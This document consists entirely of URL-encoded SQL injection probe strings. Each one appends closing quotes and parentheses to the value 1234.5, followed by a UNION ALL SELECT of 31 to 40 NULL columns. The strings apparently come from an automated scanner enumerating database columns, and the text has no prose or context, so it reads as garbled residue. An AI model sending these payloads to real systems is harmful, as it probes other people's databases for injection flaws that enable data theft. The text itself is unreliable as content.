1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 